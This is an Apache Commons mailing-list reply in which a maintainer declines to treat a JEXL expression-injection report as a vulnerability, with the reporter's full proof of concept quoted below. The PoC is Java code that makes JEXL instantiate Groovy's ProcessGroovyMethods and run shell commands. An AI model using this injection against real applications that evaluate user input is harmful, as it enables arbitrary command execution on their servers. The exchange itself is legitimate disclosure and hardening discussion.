The Apache Commons project will not treat this as a security vulnerability. Executing untrusted / unsanitized / unvalidated code in a scripting environment is always dangerous: an expression evaluated with unrestricted class access can reach anything on the classpath (here the `new("org.codehaus.groovy.runtime.ProcessGroovyMethods")` call in the report's own PoC), so the embedding application must either not evaluate expressions from untrusted sources or restrict which classes the engine may instantiate.
Progress may be followed via: https://issues.apache.org/jira/browse/JEXL-223 Mark On 21/04/17 08:52, Cloudsecintel wrote: > 0x01 Summary > Apache Commons JEXL Expression Execute Command Vulnerability through > groovy. > > 0x02 POC > {code} > import java.io.IOException; > import java.util.List; > > import org.apache.commons.jexl3.JexlBuilder; > import org.apache.commons.jexl3.JexlContext; > import org.apache.commons.jexl3.JexlEngine; > import org.apache.commons.jexl3.JexlExpression; > import org.apache.commons.jexl3.MapContext; > import org.codehaus.groovy.runtime.ProcessGroovyMethods; > > public class elExp { > public static void main(String args[]) throws IOException { > // Create or retrieve an engine > JexlEngine jexl = new JexlBuilder().create(); > // Create an expression > //String jexlExp = "new(\"java.lang.String\", \"hello wolrd\")"; > ProcessGroovyMethods n = new ProcessGroovyMethods(); > System.out.println(n.execute("id").toString()); > String jexlExp = > "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch > /tmp/jexlExp0day\")"; > JexlExpression e = jexl.createExpression( jexlExp ); > try { > > Process process = new ProcessBuilder("id").start(); > } catch (IOException e1) { > // TODO Auto-generated catch block > e1.printStackTrace(); > } > // Create a context and add data > JexlContext jc = new MapContext(); > jc.set("foo", jexlExp ); > > // Now evaluate the expression, getting the result > Object o = e.evaluate(jc); > System.out.println(o); > } > } > {code} > > Sent from ProtonMail <https://protonmail.com>, Swiss-based encrypted email. > > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected]
